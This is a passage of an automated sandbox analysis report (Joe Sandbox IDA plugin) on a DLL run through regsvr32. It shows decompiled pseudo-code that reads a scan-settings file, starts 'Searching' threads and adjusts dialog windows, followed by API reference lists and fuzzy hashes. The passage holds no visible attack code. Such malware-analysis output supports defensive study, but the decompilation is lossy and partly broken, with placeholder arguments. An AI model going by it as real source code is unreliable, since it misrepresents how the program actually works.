                                                                                                                				long* _t210;
                                                                                                                				long* _t211;
                                                                                                                				void* _t236;
                                                                                                                				intOrPtr* _t242;
                                                                                                                				long _t282;
                                                                                                                				void* _t283;
                                                                                                                				long* _t288;
                                                                                                                				signed int _t301;
                                                                                                                				struct HWND__* _t307;
                                                                                                                				void* _t321;
                                                                                                                				void* _t331;
                                                                                                                				void* _t339;
                                                                                                                				void* _t359;
                                                                                                                				intOrPtr* _t363;
                                                                                                                
                                                                                                                				_t343 = __eflags;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052030);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t236);
                                                                                                                				_push(_t321);
                                                                                                                				_t134 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t134 ^ _t339 - 0x00000064);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t331 = __ecx;
                                                                                                                				E100205E2( &_v100, __eflags);
                                                                                                                				_push(0);
                                                                                                                				_push(0x40);
                                                                                                                				_push("Setting\\ScanSet.dat");
                                                                                                                				_v4 = 0;
                                                                                                                				_t138 = E10020A24( &_v100, __edx, _t343);
                                                                                                                				_t344 = _t138;
                                                                                                                				if(_t138 == 0) {
                                                                                                                					 *(_t331 + 0x264) = 0;
                                                                                                                					 *((intOrPtr*)(_t331 + 0x268)) = 0;
                                                                                                                					 *(_t331 + 0x26c) = 1;
                                                                                                                					 *(_t331 + 0x270) = 1;
                                                                                                                					 *(_t331 + 0x274) = 1;
                                                                                                                					L23:
                                                                                                                					_t242 = _t331 + 0x284;
                                                                                                                					 *((intOrPtr*)(_t242 + 4)) = 0;
                                                                                                                					_t301 =  &_v124;
                                                                                                                					 *_t242 = 0;
                                                                                                                					_t141 = E1000E820(_t242, _t301, _t301, 0x10058760);
                                                                                                                					_t237 = _t331 + 0x454;
                                                                                                                					_v24 = 2;
                                                                                                                					E1001D2C4(_t331 + 0x454,  *_t141);
                                                                                                                					_t145 = _v136 + 0xfffffff0;
                                                                                                                					_v28 = 0;
                                                                                                                					asm("lock xadd [ecx], edx");
                                                                                                                					if((_t301 | 0xffffffff) - 1 <= 0) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t145)) + 4))))(_t145);
                                                                                                                					}
                                                                                                                					_t322 = _t331 + 0x358;
                                                                                                                					E1001D270(_t331 + 0x358, 0, 1, 0);
                                                                                                                					E1001D270(_t331 + 0x358, 0, 4, 0);
                                                                                                                					E1001D270(_t331 + 0x358, 0, 8, 0);
                                                                                                                					E1001D270(_t331 + 0x358, 0, 0x8000, 0);
                                                                                                                					SendMessageA( *(_t331 + 0x378), 0x1036, 0, 1);
                                                                                                                					_t151 = E1002AC91(_t322);
                                                                                                                					_t304 =  *(_t151 + 0x20);
                                                                                                                					_t152 = SendMessageA( *(_t151 + 0x20), 0x1200, 0, 0);
                                                                                                                					if(_t152 <= 0) {
                                                                                                                						L28:
                                                                                                                						SendMessageA( *(_t331 + 0x378), 0x1009, 0, 0);
                                                                                                                						E1002650F(_t322, 0, 0x10058800, 0, 0x64, 0xffffffff);
                                                                                                                						E1002650F(_t322, 1, 0x100587f8, 0, 0x64, 0xffffffff);
                                                                                                                						E1002650F(_t322, 2, 0x100587ec, 0, 0x64, 0xffffffff);
                                                                                                                						E1001D35E(_t322, 5);
                                                                                                                						 *((intOrPtr*)(_t331 + 0x10e8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t331 + 0x10ec)) = 0;
                                                                                                                						 *((intOrPtr*)(_t331 + 0x10f0)) = 0;
                                                                                                                						_t158 = E100173A6();
                                                                                                                						_t363 = _t158;
                                                                                                                						_t257 = 0 | _t363 == 0x00000000;
                                                                                                                						if(_t363 == 0) {
                                                                                                                							_t158 = E10001000(_t257, _t304, 0x80004005);
                                                                                                                						}
                                                                                                                						_v124 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0xc))))() + 0x10;
                                                                                                                						_push( *((intOrPtr*)(_t331 + 0x10f0)));
                                                                                                                						_push( *((intOrPtr*)(_t331 + 0x10ec)));
                                                                                                                						_v16 = 3;
                                                                                                                						E10003500( &_v124, 0x1005873c,  *((intOrPtr*)(_t331 + 0x10e8)));
                                                                                                                						_t307 = _v124;
                                                                                                                						E1001D2C4(_t331 + 0x304, _t307);
                                                                                                                						E1001D35E(_t331 + 0x304, 5);
                                                                                                                						E1001D35E(_t237, 5);
                                                                                                                						_t325 = IsWindowVisible;
                                                                                                                						if(IsWindowVisible( *(_t331 + 0x570)) == 0) {
                                                                                                                							__eflags = IsWindowVisible( *(_t331 + 0x2d0));
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L58;
                                                                                                                							}
                                                                                                                							_t176 = SendMessageA( *(_t331 + 0x2d0), 0x1042, 0, 0);
                                                                                                                							__eflags = _t176 - 6;
                                                                                                                							if(_t176 > 6) {
                                                                                                                								E10018B24(_t331, 0x100587c4, 0, 0);
                                                                                                                								goto L58;
                                                                                                                							}
                                                                                                                							switch( *((intOrPtr*)(_t176 * 4 +  &M10010B94))) {
                                                                                                                								case 0:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									goto L48;
                                                                                                                								case 1:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(1);
                                                                                                                									goto L48;
                                                                                                                								case 2:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(2);
                                                                                                                									goto L48;
                                                                                                                								case 3:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(3);
                                                                                                                									goto L48;
                                                                                                                								case 4:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(4);
                                                                                                                									goto L48;
                                                                                                                								case 5:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(5);
                                                                                                                									goto L48;
                                                                                                                								case 6:
                                                                                                                									_push(0);
                                                                                                                									_push(0);
                                                                                                                									_push(6);
                                                                                                                									L48:
                                                                                                                									 *((intOrPtr*)(_t331 + 0x294)) = CreateThread(0, 0, E1000F3A0, ??, ??, ??);
                                                                                                                									_t180 =  *(_t331 + 0x270);
                                                                                                                									__eflags = _t180;
                                                                                                                									if(_t180 == 0) {
                                                                                                                										_t307 =  *(_t331 + 0x290);
                                                                                                                										_push(1);
                                                                                                                										_push(_t307);
                                                                                                                										goto L55;
                                                                                                                									}
                                                                                                                									_t192 = _t180 - 1;
                                                                                                                									__eflags = _t192;
                                                                                                                									if(_t192 == 0) {
                                                                                                                										_push(0);
                                                                                                                										_push( *(_t331 + 0x290));
                                                                                                                										goto L55;
                                                                                                                									}
                                                                                                                									__eflags = _t192 == 1;
                                                                                                                									if(_t192 == 1) {
                                                                                                                										_push(0xffffffff);
                                                                                                                										_push( *(_t331 + 0x290));
                                                                                                                									} else {
                                                                                                                										_t307 =  *(_t331 + 0x290);
                                                                                                                										_push(0);
                                                                                                                										_push(_t307);
                                                                                                                									}
                                                                                                                									goto L56;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							E10001DB0(_t331 + 0x102c, _t307, 0x10056948, 0);
                                                                                                                							_t196 = SendMessageA( *(_t331 + 0x570), 0x110a, 0, 0);
                                                                                                                							_t307 =  *(_t331 + 0x570);
                                                                                                                							_t198 = CreateThread(0, 0, E1000FFB0, SendMessageA(_t307, 0x110a, 4, _t196), 0, 0);
                                                                                                                							_t282 =  *(_t331 + 0x270);
                                                                                                                							 *(_t331 + 0x290) = _t198;
                                                                                                                							if(_t282 == 0) {
                                                                                                                								_push(1);
                                                                                                                								_push(_t198);
                                                                                                                								L55:
                                                                                                                								L56:
                                                                                                                								SetThreadPriority();
                                                                                                                								_t182 = CreateThread(0, 0, 0x1000f2f0, 0, 0, 0);
                                                                                                                								 *(_t331 + 0x28c) = _t182;
                                                                                                                								SetThreadPriority(_t182, 0);
                                                                                                                								_t325 = _t331 + 0x4fc;
                                                                                                                								E1001D39A(_t331 + 0x4fc, 1);
                                                                                                                								E1001D35E(_t331 + 0x4fc, 5);
                                                                                                                								E1001D39A(_t331 + 0x4a8, 0);
                                                                                                                								E1001D39A(_t331 + 0x400, 1);
                                                                                                                								E1001D39A(_t331 + 0x3ac, 1);
                                                                                                                								E10001310( &_v148, "Searching");
                                                                                                                								E1001614A( &_v156);
                                                                                                                								L58:
                                                                                                                								_t172 = _v124 + 0xfffffff0;
                                                                                                                								_v16 = 0;
                                                                                                                								asm("lock xadd [ecx], edx");
                                                                                                                								_t309 = (_t307 | 0xffffffff) - 1;
                                                                                                                								_t369 = (_t307 | 0xffffffff) - 1;
                                                                                                                								if((_t307 | 0xffffffff) - 1 <= 0) {
                                                                                                                									_t309 =  *((intOrPtr*)( *_t172));
                                                                                                                									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t172)) + 4))))(_t172);
                                                                                                                								}
                                                                                                                								_v16 = 0xffffffff;
                                                                                                                								_t173 = E100206EF(_t237,  &_v112, _t309, _t325, _t331, _t369);
                                                                                                                								 *[fs:0x0] = _v24;
                                                                                                                								return _t173;
                                                                                                                							}
                                                                                                                							_t283 = _t282 - 1;
                                                                                                                							if(_t283 == 0) {
                                                                                                                								_push(0);
                                                                                                                								_push(_t198);
                                                                                                                								goto L55;
                                                                                                                							}
                                                                                                                							if(_t283 == 1) {
                                                                                                                								_push(0xffffffff);
                                                                                                                								_push(_t198);
                                                                                                                							} else {
                                                                                                                								_push(0);
                                                                                                                								_push(_t198);
                                                                                                                							}
                                                                                                                							goto L56;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_v124 = _t152;
                                                                                                                						do {
                                                                                                                							SendMessageA( *(_t331 + 0x378), 0x101c, 0, 0);
                                                                                                                							_t85 =  &_v124;
                                                                                                                							 *_t85 = _v124 - 1;
                                                                                                                						} while ( *_t85 != 0);
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t203 = _v112;
                                                                                                                				_t311 =  *((intOrPtr*)(_t203 + 0x28));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x28))))(0, 0, 0);
                                                                                                                				_push(0);
                                                                                                                				_push(0x1000);
                                                                                                                				_push(1);
                                                                                                                				_push( &_v124);
                                                                                                                				E10020058(_t236,  &_v108,  *((intOrPtr*)(_t203 + 0x28)), _t321, _t331, _t344);
                                                                                                                				_t345 = _v100 & 0x00000001;
                                                                                                                				_v44 = 1;
                                                                                                                				if((_v100 & 0x00000001) == 0) {
                                                                                                                					_push(_v104);
                                                                                                                					_push(4);
                                                                                                                					E10020287(_t236, _t311, _t321, _t331, _t345);
                                                                                                                				}
                                                                                                                				_t207 = _v84;
                                                                                                                				_t288 = _v80;
                                                                                                                				_t312 = _t207 + 4;
                                                                                                                				if(_t207 + 4 > _t288) {
                                                                                                                					E1001FADC( &_v124, _t312, _t207 - _t288 + 4);
                                                                                                                					_t288 = _v84;
                                                                                                                					_t207 = _v88;
                                                                                                                				}
                                                                                                                				_t313 =  *_t207;
                                                                                                                				_t208 = _t207 + 4;
                                                                                                                				_t348 = _v100 & 0x00000001;
                                                                                                                				 *((intOrPtr*)(_t331 + 0x268)) =  *_t207;
                                                                                                                				_v84 = _t208;
                                                                                                                				if((_v100 & 0x00000001) == 0) {
                                                                                                                					_push(_v104);
                                                                                                                					_push(4);
                                                                                                                					_t208 = E10020287(_t236, _t313, _t321, _t331, _t348);
                                                                                                                				}
                                                                                                                				_t27 =  &(_t208[1]); // 0x4
                                                                                                                				_t314 = _t27;
                                                                                                                				if(_t27 > _t288) {
                                                                                                                					E1001FADC( &_v124, _t314, _t208 - _t288 + 4);
                                                                                                                					_t288 = _v84;
                                                                                                                					_t208 = _v88;
                                                                                                                				}
                                                                                                                				_t315 =  *_t208;
                                                                                                                				_t209 =  &(_t208[1]);
                                                                                                                				_t351 = _v100 & 0x00000001;
                                                                                                                				 *(_t331 + 0x26c) =  *_t208;
                                                                                                                				_v84 = _t209;
                                                                                                                				if((_v100 & 0x00000001) == 0) {
                                                                                                                					_push(_v104);
                                                                                                                					_push(4);
                                                                                                                					_t209 = E10020287(_t236, _t315, _t321, _t331, _t351);
                                                                                                                				}
                                                                                                                				_t37 =  &(_t209[1]); // 0x4
                                                                                                                				_t316 = _t37;
                                                                                                                				if(_t37 > _t288) {
                                                                                                                					E1001FADC( &_v124, _t316, _t209 - _t288 + 4);
                                                                                                                					_t288 = _v84;
                                                                                                                					_t209 = _v88;
                                                                                                                				}
                                                                                                                				_t317 =  *_t209;
                                                                                                                				_t210 =  &(_t209[1]);
                                                                                                                				_t354 = _v100 & 0x00000001;
                                                                                                                				 *(_t331 + 0x270) =  *_t209;
                                                                                                                				_v84 = _t210;
                                                                                                                				if((_v100 & 0x00000001) == 0) {
                                                                                                                					_push(_v104);
                                                                                                                					_push(4);
                                                                                                                					_t210 = E10020287(_t236, _t317, _t321, _t331, _t354);
                                                                                                                				}
                                                                                                                				_t47 =  &(_t210[1]); // 0x4
                                                                                                                				_t318 = _t47;
                                                                                                                				if(_t47 > _t288) {
                                                                                                                					E1001FADC( &_v124, _t318, _t210 - _t288 + 4);
                                                                                                                					_t288 = _v84;
                                                                                                                					_t210 = _v88;
                                                                                                                				}
                                                                                                                				_t319 =  *_t210;
                                                                                                                				_t211 =  &(_t210[1]);
                                                                                                                				_t357 = _v100 & 0x00000001;
                                                                                                                				 *(_t331 + 0x264) =  *_t210;
                                                                                                                				_v84 = _t211;
                                                                                                                				if((_v100 & 0x00000001) == 0) {
                                                                                                                					_push(_v104);
                                                                                                                					_push(4);
                                                                                                                					_t211 = E10020287(_t236, _t319, _t321, _t331, _t357);
                                                                                                                				}
                                                                                                                				_t57 =  &(_t211[1]); // 0x4
                                                                                                                				_t320 = _t57;
                                                                                                                				if(_t57 > _t288) {
                                                                                                                					_t359 = _t211 - _t288 + 4;
                                                                                                                					E1001FADC( &_v124, _t320, _t211 - _t288 + 4);
                                                                                                                					_t211 = _v88;
                                                                                                                				}
                                                                                                                				 *(_t331 + 0x274) =  *_t211;
                                                                                                                				_v84 =  &(_t211[1]);
                                                                                                                				E1001FEB3( &_v124, _t359);
                                                                                                                				E10020580(_t236,  &_v140);
                                                                                                                				_v44 = 0;
                                                                                                                				E1002001A(_t236,  &_v124, _t320, _t321, _t331, _t359);
                                                                                                                				goto L23;
                                                                                                                			}
























































                                                                                                                0x10010a10
                                                                                                                0x10010b3d
                                                                                                                0x00000000
                                                                                                                0x10010b3d
                                                                                                                0x10010a16
                                                                                                                0x00000000
                                                                                                                0x10010a1d
                                                                                                                0x10010a1f
                                                                                                                0x10010a21
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a25
                                                                                                                0x10010a27
                                                                                                                0x10010a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a2d
                                                                                                                0x10010a2f
                                                                                                                0x10010a31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a35
                                                                                                                0x10010a37
                                                                                                                0x10010a39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a3d
                                                                                                                0x10010a3f
                                                                                                                0x10010a41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a45
                                                                                                                0x10010a47
                                                                                                                0x10010a49
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a4d
                                                                                                                0x10010a4f
                                                                                                                0x10010a51
                                                                                                                0x10010a53
                                                                                                                0x10010a64
                                                                                                                0x10010a70
                                                                                                                0x10010a70
                                                                                                                0x10010a73
                                                                                                                0x10010aa6
                                                                                                                0x10010aac
                                                                                                                0x10010aae
                                                                                                                0x00000000
                                                                                                                0x10010aae
                                                                                                                0x10010a75
                                                                                                                0x10010a75
                                                                                                                0x10010a78
                                                                                                                0x10010aa1
                                                                                                                0x10010aa3
                                                                                                                0x00000000
                                                                                                                0x10010aa3
                                                                                                                0x10010a7a
                                                                                                                0x10010a83
                                                                                                                0x10010a96
                                                                                                                0x10010a98
                                                                                                                0x10010a85
                                                                                                                0x10010a85
                                                                                                                0x10010a8b
                                                                                                                0x10010a8d
                                                                                                                0x10010a8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001095e
                                                                                                                0x1001096b
                                                                                                                0x10010980
                                                                                                                0x10010982
                                                                                                                0x100109a7
                                                                                                                0x100109af
                                                                                                                0x100109b2
                                                                                                                0x100109b8
                                                                                                                0x100109e2
                                                                                                                0x100109e4
                                                                                                                0x10010aaf
                                                                                                                0x10010ab5
                                                                                                                0x10010ab5
                                                                                                                0x10010ac6
                                                                                                                0x10010acb
                                                                                                                0x10010ad1
                                                                                                                0x10010ad3
                                                                                                                0x10010add
                                                                                                                0x10010ae6
                                                                                                                0x10010af3
                                                                                                                0x10010b00
                                                                                                                0x10010b0d
                                                                                                                0x10010b22
                                                                                                                0x10010b2b
                                                                                                                0x10010b42
                                                                                                                0x10010b46
                                                                                                                0x10010b49
                                                                                                                0x10010b57
                                                                                                                0x10010b5b
                                                                                                                0x10010b5c
                                                                                                                0x10010b5e
                                                                                                                0x10010b62
                                                                                                                0x10010b68
                                                                                                                0x10010b68
                                                                                                                0x10010b6e
                                                                                                                0x10010b79
                                                                                                                0x10010b82
                                                                                                                0x10010b91
                                                                                                                0x10010b91
                                                                                                                0x100109ba
                                                                                                                0x100109bd
                                                                                                                0x100109da
                                                                                                                0x100109dc
                                                                                                                0x00000000
                                                                                                                0x100109dc
                                                                                                                0x100109c8
                                                                                                                0x100109d2
                                                                                                                0x100109d4
                                                                                                                0x100109ca
                                                                                                                0x100109ca
                                                                                                                0x100109cc
                                                                                                                0x100109cc
                                                                                                                0x00000000
                                                                                                                0x100109c8
                                                                                                                0x10010842
                                                                                                                0x10010842
                                                                                                                0x10010846
                                                                                                                0x10010856
                                                                                                                0x10010858
                                                                                                                0x10010858
                                                                                                                0x10010858
                                                                                                                0x00000000
                                                                                                                0x10010846
                                                                                                                0x10010840
                                                                                                                0x100105c4
                                                                                                                0x100105c8
                                                                                                                0x100105d2
                                                                                                                0x100105d4
                                                                                                                0x100105d5
                                                                                                                0x100105da
                                                                                                                0x100105e0
                                                                                                                0x100105e5
                                                                                                                0x100105ea
                                                                                                                0x100105ef
                                                                                                                0x100105f7
                                                                                                                0x100105fd
                                                                                                                0x100105fe
                                                                                                                0x10010600
                                                                                                                0x10010600
                                                                                                                0x10010605
                                                                                                                0x10010609
                                                                                                                0x1001060d
                                                                                                                0x10010612
                                                                                                                0x1001061e
                                                                                                                0x10010623
                                                                                                                0x10010627
                                                                                                                0x10010627
                                                                                                                0x1001062b
                                                                                                                0x1001062d
                                                                                                                0x10010630
                                                                                                                0x10010635
                                                                                                                0x1001063b
                                                                                                                0x1001063f
                                                                                                                0x10010645
                                                                                                                0x10010646
                                                                                                                0x10010648
                                                                                                                0x10010648
                                                                                                                0x1001064d
                                                                                                                0x1001064d
                                                                                                                0x10010652
                                                                                                                0x1001065e
                                                                                                                0x10010663
                                                                                                                0x10010667
                                                                                                                0x10010667
                                                                                                                0x1001066b
                                                                                                                0x1001066d
                                                                                                                0x10010670
                                                                                                                0x10010675
                                                                                                                0x1001067b
                                                                                                                0x1001067f
                                                                                                                0x10010685
                                                                                                                0x10010686
                                                                                                                0x10010688
                                                                                                                0x10010688
                                                                                                                0x1001068d
                                                                                                                0x1001068d
                                                                                                                0x10010692
                                                                                                                0x1001069e
                                                                                                                0x100106a3
                                                                                                                0x100106a7
                                                                                                                0x100106a7
                                                                                                                0x100106ab
                                                                                                                0x100106ad
                                                                                                                0x100106b0
                                                                                                                0x100106b5
                                                                                                                0x100106bb
                                                                                                                0x100106bf
                                                                                                                0x100106c5
                                                                                                                0x100106c6
                                                                                                                0x100106c8
                                                                                                                0x100106c8
                                                                                                                0x100106cd
                                                                                                                0x100106cd
                                                                                                                0x100106d2
                                                                                                                0x100106de
                                                                                                                0x100106e3
                                                                                                                0x100106e7
                                                                                                                0x100106e7
                                                                                                                0x100106eb
                                                                                                                0x100106ed
                                                                                                                0x100106f0
                                                                                                                0x100106f5
                                                                                                                0x100106fb
                                                                                                                0x100106ff
                                                                                                                0x10010705
                                                                                                                0x10010706
                                                                                                                0x10010708
                                                                                                                0x10010708
                                                                                                                0x1001070d
                                                                                                                0x1001070d
                                                                                                                0x10010712
                                                                                                                0x10010716
                                                                                                                0x1001071e
                                                                                                                0x10010723
                                                                                                                0x10010723
                                                                                                                0x10010729
                                                                                                                0x10010736
                                                                                                                0x1001073a
                                                                                                                0x10010743
                                                                                                                0x1001074c
                                                                                                                0x10010754
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • SendMessageA.USER32 ref: 10010826
                                                                                                                • SendMessageA.USER32 ref: 1001083C
                                                                                                                • SendMessageA.USER32 ref: 10010856
                                                                                                                • SendMessageA.USER32 ref: 1001086F
                                                                                                                  • Part of subcall function 10020058: __EH_prolog3.LIBCMT ref: 1002005F
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                  • Part of subcall function 1002001A: __EH_prolog3.LIBCMT ref: 10020021
                                                                                                                  • Part of subcall function 1002650F: SendMessageA.USER32 ref: 10026558
                                                                                                                  • Part of subcall function 1001D35E: ShowWindow.USER32(?,?), ref: 1001D36B
                                                                                                                • IsWindowVisible.USER32(?), ref: 10010954
                                                                                                                • SendMessageA.USER32 ref: 10010980
                                                                                                                • SendMessageA.USER32 ref: 10010991
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000FFB0,00000000,00000000,00000000), ref: 100109A7
                                                                                                                • SetThreadPriority.KERNEL32(?,00000001), ref: 10010AB5
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,1000F2F0,00000000,00000000,00000000), ref: 10010AC6
                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000), ref: 10010AD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Thread$H_prolog3$CreatePriorityWindow$Exception@8ShowThrowVisiblelstrlen
                                                                                                                • String ID: Searching$Setting\ScanSet.dat
                                                                                                                • API String ID: 2124478951-365256678
                                                                                                                • Opcode ID: 690367f24c0ce8a48474270274093a9fee1c207101ca0c2174ac5d4b342acbf3
                                                                                                                • Instruction ID: dec44e09df43663d398fd34b81c8922999eac6ca1bf05e88d62e9de328a498c8
                                                                                                                • Opcode Fuzzy Hash: 690367f24c0ce8a48474270274093a9fee1c207101ca0c2174ac5d4b342acbf3
                                                                                                                • Instruction Fuzzy Hash: 4D029F71344701ABE224DB64CC82FABB7E5EF84744F10460CF69AAB2D1DBB1F9458B15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1002B6AB(void* __ecx, void* __edx) {
                                                                                                                				int _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				struct tagRECT _v32;
                                                                                                                				struct tagRECT _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t70;
                                                                                                                				struct HWND__* _t75;
                                                                                                                				struct HWND__* _t86;
                                                                                                                				intOrPtr _t92;
                                                                                                                				struct HWND__* _t99;
                                                                                                                				void* _t117;
                                                                                                                				void* _t118;
                                                                                                                				struct HWND__* _t119;
                                                                                                                				void* _t131;
                                                                                                                				void* _t133;
                                                                                                                				void* _t142;
                                                                                                                
                                                                                                                				_t131 = __edx;
                                                                                                                				_t133 = __ecx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0xa4)) == 0 && GetDlgItem( *(__ecx + 0x20), 0x3020) != 0) {
                                                                                                                					E10017DA9(_t114, 0x200, 0, 0);
                                                                                                                				}
                                                                                                                				_t117 = GetWindowRect;
                                                                                                                				if(( *(_t133 + 0x58) & 0x01000020) == 0) {
                                                                                                                					_t86 = GetDlgItem( *(_t133 + 0x20), 0x3020);
                                                                                                                					_v12 = _t86;
                                                                                                                					GetWindowRect(_t86,  &_v32);
                                                                                                                					E10024274(_t133,  &_v32);
                                                                                                                					_v48.left = 0;
                                                                                                                					_v48.top = 0;
                                                                                                                					_v48.right = 0;
                                                                                                                					_v48.bottom = 0x20;
                                                                                                                					MapDialogRect( *(_t133 + 0x20),  &_v48);
                                                                                                                					_t92 = _v32.bottom;
                                                                                                                					if(_v48.bottom < _t92) {
                                                                                                                						_v16 = _t92 - _v32.top - _v48.bottom;
                                                                                                                						SetWindowPos(_v12, 0, 0, 0, _v32.right - _v32.left, _v48.bottom, 0x16);
                                                                                                                						_v8 = 0;
                                                                                                                						do {
                                                                                                                							_t99 = GetDlgItem( *(_t133 + 0x20),  *(_v8 + 0x1006d5e8));
                                                                                                                							_v12 = _t99;
                                                                                                                							if(_t99 != 0) {
                                                                                                                								GetWindowRect(_t99,  &_v32);
                                                                                                                								E10024274(_t133,  &_v32);
                                                                                                                								SetWindowPos(_v12, 0, _v32.left, _v32.top - _v16, 0, 0, 0x15);
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 4;
                                                                                                                						} while (_v8 < 0x10);
                                                                                                                						GetWindowRect( *(_t133 + 0x20),  &_v32);
                                                                                                                						_t142 = _v32.right - _v32.left;
                                                                                                                						E1001D569(_t133, 0, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top - _v16, 0x16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v16 = E10019B72(_t117, _t133, 0, _t142);
                                                                                                                				if( *((intOrPtr*)(_t133 + 0xa8)) != 0 && ( *(_t133 + 0x58) & 0x01000020) == 0) {
                                                                                                                					GetWindowRect( *(_t133 + 0x20),  &_v48);
                                                                                                                					_t75 = GetDlgItem( *(_t133 + 0x20), 1);
                                                                                                                					if(_t75 != 0) {
                                                                                                                						GetWindowRect(_t75,  &_v32);
                                                                                                                						E1001D569(_t133, 0, 0, 0, _v48.right - _v48.left, _v32.top - _v48.top, 0x16);
                                                                                                                					}
                                                                                                                					_v8 = 0;
                                                                                                                					do {
                                                                                                                						_t119 = GetDlgItem( *(_t133 + 0x20),  *(_v8 + 0x1006d5e8));
                                                                                                                						if(_t119 != 0) {
                                                                                                                							ShowWindow(_t119, 0);
                                                                                                                							EnableWindow(_t119, 0);
                                                                                                                						}
                                                                                                                						_v8 = _v8 + 4;
                                                                                                                					} while (_v8 < 0x10);
                                                                                                                				}
                                                                                                                				_t70 = E1001D23C(_t133);
                                                                                                                				_pop(_t118);
                                                                                                                				if((_t70 & 0x40000000) == 0) {
                                                                                                                					E100195F7(_t118, _t133, _t131, 0);
                                                                                                                				}
                                                                                                                				return _v16;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 1002B6C7
                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 1002B6FA
                                                                                                                • GetWindowRect.USER32 ref: 1002B708
                                                                                                                • MapDialogRect.USER32(?,?), ref: 1002B72C
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 1002B759
                                                                                                                • GetDlgItem.USER32(00000020,?), ref: 1002B76E
                                                                                                                • GetWindowRect.USER32 ref: 1002B780
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1002B79F
                                                                                                                • GetWindowRect.USER32 ref: 1002B7B6
                                                                                                                • GetWindowRect.USER32 ref: 1002B7F7
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 1002B7FE
                                                                                                                • GetWindowRect.USER32 ref: 1002B80D
                                                                                                                • GetDlgItem.USER32(?,?), ref: 1002B838
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 1002B846
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1002B84E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Item$DialogEnableShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 763981185-3916222277
